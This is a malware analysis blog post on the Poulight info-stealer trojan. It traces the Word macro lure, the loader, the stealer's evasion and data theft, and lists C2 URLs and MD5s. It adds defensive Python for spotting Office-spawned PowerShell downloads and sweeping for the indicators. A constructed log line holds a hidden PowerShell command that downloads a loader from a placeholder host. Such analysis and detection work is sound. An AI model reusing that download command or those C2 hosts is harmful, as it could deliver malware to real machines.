Poulight is an info-stealer trojan that most probably originated in Russia. It is written in .NET and can collect sensitive information and deliver it to cybercriminals. Since its first appearance it has grown substantially and taken on different forms. The main infection vector remains spear-phishing emails. It was sold for just a handful of dollars, making it easily accessible to cybercriminals. Its website ‘poullight[.]ru’ called it ‘Poulight Stealer’ and boasted that it was the best product on the internet.
It begins with a document named “Minecraft how to play guide.docm”, which is a Microsoft Word file. The file contains an image from the Minecraft game along with some abusive Russian text.
This document contains a macro that executes automatically if macros are enabled. The macro is simple: it uses cmd.exe to run a PowerShell command that downloads an additional executable. This executable is saved as mess.exe and executed.
‘mess.exe’ is a loader for Poulight. It carries two more executables stored in ‘RCDATA’ resources. The resource entries A1 and A2 contain the .exe files, and B1 and B2 contain the respective file names of those executables.
Upon execution, ‘mess.exe’ drops the executables stored in RCDATA into the %tmp% folder and launches them using ‘ShellExecuteA’.
The two executables dropped into the %tmp% folder are ‘fakerror.exe’ and ‘injector(automatic).exe’.
Here is the complete process flow of Poulight Stealer.
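The infection chain above (Word document → macro → cmd.exe → PowerShell download → mess.exe in %tmp%) is visible in process-creation telemetry as a parent/child chain rooted at WINWORD.EXE. The following is an added detection example written for this post, not Quick Heal's own code: it parses constructed Sysmon-style process-creation records (the tab-separated key=value format, the PIDs and the command lines are all made up for illustration, and the download URL is a placeholder) and flags any shell whose ancestry includes an Office application, raising the severity when the command line also contains a PowerShell download primitive.

```python
"""Flag the Office -> cmd.exe -> PowerShell download chain in process-creation events.

Added example: the log format below is constructed for illustration
(Sysmon event 1 style fields), not a real telemetry export.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
# Common PowerShell download primitives; their presence raises the severity.
DOWNLOAD_RE = re.compile(
    r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|start-bitstransfer", re.I)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


@dataclass
class Alert:
    severity: str   # "medium": Office spawned a shell; "high": and that shell downloads
    chain: list     # process names from the oldest known ancestor to the flagged process
    pid: int


def basename(path):
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def parse_log(text):
    """Parse tab-separated key=value records (constructed format) into events."""
    events = []
    for line in text.strip().splitlines():
        fields = dict(kv.split("=", 1) for kv in line.split("\t"))
        events.append(ProcEvent(int(fields["pid"]), int(fields["ppid"]),
                                fields["image"], fields["cmdline"]))
    return events


def ancestry(event, by_pid, max_depth=8):
    """Return [event, parent, grandparent, ...] as far as the log allows."""
    lineage = [event]
    while lineage[-1].ppid in by_pid and len(lineage) < max_depth:
        lineage.append(by_pid[lineage[-1].ppid])
    return lineage


def find_office_shell_chains(events):
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        if basename(e.image) not in SHELLS:
            continue
        lineage = ancestry(e, by_pid)
        if not any(basename(a.image) in OFFICE_APPS for a in lineage[1:]):
            continue
        severity = "high" if DOWNLOAD_RE.search(e.cmdline) else "medium"
        alerts.append(Alert(severity, [basename(a.image) for a in reversed(lineage)], e.pid))
    return alerts


# Constructed sample: the user opens the lure document, the macro runs cmd.exe,
# which runs PowerShell to fetch the loader into %TEMP%. A benign PowerShell
# launched from Explorer is included to show that it is not flagged.
SAMPLE_LOG = "\n".join([
    "pid=4120\tppid=988\timage=C:\\Windows\\explorer.exe\tcmdline=explorer.exe",
    "pid=5012\tppid=4120\timage=C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"
    "\tcmdline=\"WINWORD.EXE\" /n \"C:\\Users\\victim\\Downloads\\Minecraft how to play guide.docm\"",
    "pid=5300\tppid=5012\timage=C:\\Windows\\System32\\cmd.exe\tcmdline=cmd.exe /c powershell -w hidden",
    "pid=5412\tppid=5300\timage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tcmdline=powershell -w hidden (New-Object Net.WebClient).DownloadFile('http://example.invalid/x',"
    "'C:\\Users\\victim\\AppData\\Local\\Temp\\mess.exe')",
    "pid=6001\tppid=4120\timage=C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
    "\tcmdline=powershell Get-Date",
])

if __name__ == "__main__":
    for a in find_office_shell_chains(parse_log(SAMPLE_LOG)):
        print(a.severity, a.pid, " -> ".join(a.chain))
```

Walking the ancestry rather than checking only the direct parent matters here because the macro puts cmd.exe between Word and PowerShell; a rule that only looks at WINWORD.EXE → powershell.exe would miss the download step and see only the lower-severity cmd.exe spawn.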
fakerror.exe is a .NET executable and does exactly what its name implies. Its sole purpose is to display a fake error message.
The fake message is in Turkish, as shown in the above figure. According to Google Translate, it means ‘The Program cannot be started. VM or Windows under update 10 detected’.
Its purpose is to make it appear that the executable failed to run, while the other executable (‘injector(automatic).exe’) is in fact running successfully.
The next executable, ‘injector(automatic).exe’, is the actual Poulight Stealer. When injector(automatic).exe runs on the target system, one of the first things it does is check whether it is running on a real computer or on a virtual machine. If virtual-machine activity is detected, the malware terminates.
The above function uses classic Windows Management Instrumentation (WMI) through the execution of the query “Select * from Win32_ComputerSystem”.
The following are some of the checks used to detect virtual environments and sandboxes.
The malware then creates two randomly named folders of the form ‘C:\Users\<user>\AppData\Local\<random-8-letters>’, which are used later. The paths of the Desktop, AppData, Local AppData, and Documents folders are also stored in class variables.
Next, the configuration and parameters are read from the resources. Below is the code responsible for reading the configuration and parameters. The parameters are stored in an array for later use.
Below is the figure of decoded configuration and parameters.
A check is performed for the presence of a file in the %tmp% directory, which indicates that the malware is already present. This file serves as a mutex to prevent re-infection of a system on which the malware is already running. Subsequently, the main function responsible for all information gathering and exfiltration is called. This function is named ‘Start’ and lives in the ‘xs’ class. The very first function called inside ‘Start’ is ‘Information.AVDetect()’, which, as the name suggests, detects any installed AV product. System information is then extracted from the registry. This information includes the user name, machine name, processor and video controller, which can be used to identify virtual machines.
This gathered information is stored in one of the two folders generated in Local AppData in a file named ‘PC-Information.txt’. A list of all running processes is also stored in the same directory in a file named ‘ProcessList.txt’.
After gathering system information, it begins actively stealing sensitive data from various programs. Below is the list of the malware’s capabilities for stealing data from infected systems.
The DesktopImg.Start() function takes a screenshot of the active desktop. Webcam.start() captures a webcam picture.
The DFiles class is interesting, as it carries the list of file extensions that the stealer treats as sensitive documents.
Collected files with these extensions are searched for words commonly associated with stored credentials, such as ‘password’ and ‘login’.
The search() function hunts through all browsers and their login-data paths using the string_0() and BrowList2() functions.
All the scraped information is stored in the previously created Local AppData directory. Below is the massive amount of sensitive data that the stealer has captured.
All this information is zipped together in a new file in the AppData roaming directory.
This zip file along with the other collected information is stored in a unique data structure.
This collected data is then uploaded to URL ‘https://f0429164[.]xsph.run/Panel/gate.php’.
After the data has been uploaded successfully, there is a provision to download an additional payload from the URL ‘https://ru-uid-507352920[.]pp.ru/example.exe’. This mechanism can also be used for self-update.
Quick Heal detects all the malicious components of this malware. The main ‘injector(automatic).exe’, i.e. poulight.exe, is detected as “Trojan.Stealer.S12567177”.
Filename: minecraft how to play guide.docm MD5: 7FBC52BB2BCE064A51D671C8CA20FB1E
Filename: injector(automatic).exe (Poulight.exe) MD5: 8E855BCB97E9D1DCB2C79C580DCA7F2D
Filename: Mess.exe (ET3.exe) MD5: 58386adaea3b5e737144388e6607d8a5
Filename: fakerror.exe MD5: 3F4BC3D0287D911603691767C5D372FA
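The indicators in this post (the four MD5s, the dropped file names, the ‘PC-Information.txt’ and ‘ProcessList.txt’ artefacts, and the two C2/payload hosts) are enough for a simple retro-hunt. The following is an added example written for this post, not Quick Heal's code: it hashes every file under a directory tree, matches names and MD5s against the values printed above, and scans proxy-log lines for the C2 hosts, which are kept defanged as printed and refanged only at match time. The directory layout and proxy-log lines it runs on are constructed; the zero-byte ‘fakerror.exe’ it creates is a stand-in, not the malware.

```python
"""Sweep a directory tree and a proxy log for the Poulight indicators from the write-up.

Added example: the hashes, file names and hosts are the ones printed in the
post; the directory layout and proxy-log lines below are constructed.
"""
import hashlib
import os
import re
import tempfile

# MD5s as listed in the post, lower-cased for comparison.
KNOWN_MD5 = {
    "7fbc52bb2bce064a51d671c8ca20fb1e": "minecraft how to play guide.docm",
    "8e855bcb97e9d1dcb2c79c580dca7f2d": "injector(automatic).exe (Poulight.exe)",
    "58386adaea3b5e737144388e6607d8a5": "Mess.exe (ET3.exe)",
    "3f4bc3d0287d911603691767c5d372fa": "fakerror.exe",
}
# Dropped binaries and artefacts written by the stealer, matched by name.
KNOWN_NAMES = {"mess.exe", "fakerror.exe", "injector(automatic).exe",
               "pc-information.txt", "processlist.txt"}
# C2 / payload hosts, kept defanged as printed and refanged only for matching.
DEFANGED_HOSTS = ["f0429164[.]xsph.run", "ru-uid-507352920[.]pp.ru"]


def refang(indicator):
    return indicator.replace("[.]", ".")


HOST_RE = re.compile("|".join(re.escape(refang(h)) for h in DEFANGED_HOSTS), re.I)


def md5_of(path, chunk=1 << 20):
    h = hashlib.md5()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk), b""):
            h.update(block)
    return h.hexdigest()


def scan_directory(root):
    """Return [(path, reason)] for files matching a known name or a known MD5."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() in KNOWN_NAMES:
                hits.append((path, f"known filename: {name}"))
            try:
                digest = md5_of(path)
            except OSError:
                continue  # unreadable file: skip it rather than abort the sweep
            if digest in KNOWN_MD5:
                hits.append((path, f"MD5 {digest} = {KNOWN_MD5[digest]}"))
    return hits


def scan_proxy_log(lines):
    """Return (line_number, host) for every line that references a Poulight host."""
    out = []
    for n, line in enumerate(lines, 1):
        m = HOST_RE.search(line)
        if m:
            out.append((n, m.group(0).lower()))
    return out


# Constructed proxy-log lines: one C2 upload, one benign request, one payload fetch.
SAMPLE_PROXY_LOG = [
    "10:11:12 10.0.0.21 POST https://f0429164.xsph.run/Panel/gate.php 200",
    "10:11:13 10.0.0.21 GET https://www.example.com/ 200",
    "10:12:40 10.0.0.21 GET https://ru-uid-507352920.pp.ru/example.exe 200",
]


def demo_sweep():
    """Build a constructed (not infected) temp tree, sweep it, and return the findings."""
    with tempfile.TemporaryDirectory() as root:
        temp_dir = os.path.join(root, "Temp")
        os.makedirs(temp_dir)
        placeholder = os.path.join(temp_dir, "fakerror.exe")
        open(placeholder, "wb").close()  # zero-byte stand-in, not the real binary
        with open(os.path.join(root, "notes.txt"), "w") as f:
            f.write("benign content")
        return {
            "hits": [(os.path.basename(p), r) for p, r in scan_directory(root)],
            "placeholder_md5": md5_of(placeholder),
        }


if __name__ == "__main__":
    print(demo_sweep())
    print(scan_proxy_log(SAMPLE_PROXY_LOG))
```

Name matches are weaker evidence than hash matches (any file can be called fakerror.exe), so in practice the two reasons should be weighted differently when triaging; the host matches are the strongest signal here because the post ties both hosts directly to exfiltration and payload delivery.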